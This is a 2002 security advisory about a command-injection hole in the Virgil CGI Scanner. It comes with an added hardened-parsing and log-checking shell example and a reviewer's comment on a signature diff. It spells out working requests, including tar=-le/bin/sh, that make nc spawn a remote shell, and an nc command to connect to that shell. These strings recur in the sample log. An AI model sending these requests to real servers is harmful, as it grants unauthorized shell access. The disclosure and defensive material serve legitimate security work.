[UNIX] Virgil CGI Scanner Vulnerability
From: support@securiteam.com Date: 10/22/02
From: support@securiteam.com To: list@securiteam.com Date: 22 Oct 2002 21:09:08 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Virgil CGI Scanner Vulnerability
------------------------------------------------------------------------
SUMMARY
Joschka Fischer discovered a security hole in the CGI vulnerability
scanner 'Virgil' (http://www.computec.ch/) by Marc Ruef. By sending a
specially crafted request one is able to spawn a remote shell with the
privileges of the running CGI script.
Depending on the server configuration this is either the owner of the
script (suExec) or the user the HTTP daemon runs as (usually nobody).
DETAILS
Vulnerable systems:
* Virgil CGI Scanner version 0.9
Virgil CGI Scanner by Marc Ruef is a simple Bash script which offers an
interface to start CGI security audits against remote hosts. The author
states that his software is the first free online CGI scanner and that it
uses a very effective and fast technique to determine vulnerabilities.
To get the Virgil CGI Scanner look at:
http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz
MD5SUM: fe098b68c0de04cb0200f2db324ab10b
For a running version visit:
http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi
Technical Description:
The following vulnerability is present in Virgil CGI Scanner:
BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`
Here, both variables are user-supplied and neither is validated beyond
the prefix stripping shown:
TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' | sed s/"tar="//`
ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' | sed s/"zielport="// | sed "s/-//g"`
Nevertheless there are a few restrictions, namely:
- $QUERY_STRING is not URL-decoded, i.e. %20 for example is not replaced
with ' '
- In $ZIELPORT the dash ('-') is filtered out
To test whether the script is vulnerable, use the following request and
telnet to the given port number (here 31337):
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337
Exploitation is very straightforward as long as nc supports the -e
option:
'/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port
for exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v
TARGET.COM 1030-6000` while constantly requesting the URI mentioned above.
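The root cause is that the two query parameters are passed to nc unvalidated, so a value beginning with a dash is parsed as an nc option. The following is an added example, not code from the advisory or from Virgil: it puts the advisory's extraction (rewritten as a function, same behaviour) next to an allow-list version that only accepts a plain hostname and a numeric port, and reuses that check to pick suspicious requests out of an access log. The parameter names (tar, zielport) and the 10-second timeout come from the advisory; the function names, the allow-list rules and the sample log lines are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the advisory or of Virgil. Function names,
# validation rules and the sample log below are constructed.

# The advisory's extraction, unchanged in behaviour: only the "tar=" and
# "zielport=" prefixes (and dashes in the port) are stripped, so a value
# such as "-lp" reaches nc intact and is parsed as an option.
vulnerable_parse() {
    qs=$1
    target=$(printf '%s' "$qs" | awk 'BEGIN{FS="&"}{print $1}' | sed 's/tar=//')
    port=$(printf '%s' "$qs" | awk 'BEGIN{FS="&"}{print $2}' | sed 's/zielport=//' | sed 's/-//g')
    printf '%s %s\n' "$target" "$port"
}

# Allow-list version. Prints "host port" and returns 0 only when the host
# is a plain DNS name (letters, digits, dots, dashes, no leading dash) and
# the port is 1..65535; returns 1 for anything else. IPv6 literals and
# URL-encoded input are rejected rather than decoded.
hardened_parse() {
    qs=$1
    target=${qs%%&*}
    rest=${qs#*&}
    port=${rest%%&*}
    target=${target#tar=}
    port=${port#zielport=}
    case $target in
        ''|-*|*[!A-Za-z0-9.-]*) return 1 ;;
    esac
    case $port in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ ${#port} -le 5 ] || return 1
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || return 1
    printf '%s %s\n' "$target" "$port"
}

# Banner grab that refuses to run nc unless validation passed. Quoting the
# expansions keeps each value a single argument; the allow-list keeps it
# from being an option. (Not exercised by the tests; needs nc installed.)
safe_banner() {
    parsed=$(hardened_parse "$1") || { echo "rejected: $1" >&2; return 1; }
    set -- $parsed
    printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -w 10 "$1" "$2"
}

# Log check: print the access-log lines (read from stdin) whose virgil.cgi
# query string fails the same allow-list.
flag_requests() {
    while IFS= read -r line; do
        case $line in *virgil.cgi\?*) ;; *) continue ;; esac
        qs=${line#*virgil.cgi\?}
        qs=${qs%% *}
        hardened_parse "$qs" >/dev/null || printf '%s\n' "$line"
    done
}

# Constructed sample log (not real traffic): one normal scan request and
# two requests whose tar value is an nc option.
SAMPLE_LOG='10.0.0.1 - - [22/Oct/2002:21:09:08 +0200] "GET /cgi-bin/virgil.cgi?tar=www.example.com&zielport=80 HTTP/1.0" 200 512
10.0.0.2 - - [22/Oct/2002:21:09:10 +0200] "GET /cgi-bin/virgil.cgi?tar=-lp&zielport=31337 HTTP/1.0" 200 12
10.0.0.3 - - [22/Oct/2002:21:09:12 +0200] "GET /cgi-bin/virgil.cgi?tar=-le/bin/sh HTTP/1.0" 200 12'

printf '%s\n' "$SAMPLE_LOG" | flag_requests
```

Run as-is it prints the two flagged log lines; feed a real access log into flag_requests to do the same over recorded traffic. The design point is that the same allow-list serves both purposes: put in front of nc it closes the hole, and run over logs it tells you whether the hole was ever tried.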
Workaround / Patch:
We are currently not aware of any patches, but we suggest updating your
Virgil vulnerable-CGI script database accordingly:
*** apache.db.old Sun Oct 23 23:05:05 1983
--- apache.db Sun Oct 23 23:05:05 1985
***************
*** 1,3 ****
--- 1,5 ----
+ cgi-bin/virgil.cgi?tar=-lp&zielport=31337
+ cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd
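Review bot: the two added entries only fingerprint the exact test URI from the advisory (tar=-lp&zielport=31337), so a scan matches an installed copy only if it answers that specific request; since the weakness is in the script itself, entries on the bare paths `cgi-bin/virgil.cgi` and `cgi-bin/virgil/virgil.cgi` would flag every installed copy regardless of arguments. The header timestamps (Sun Oct 23 23:05:05 1983 / 1985) are also clearly not the files' real modification times; regenerate the diff from the actual files so the header is trustworthy.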
ADDITIONAL INFORMATION
The information has been provided by Marc Ruef (marc.ruef@computec.ch).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.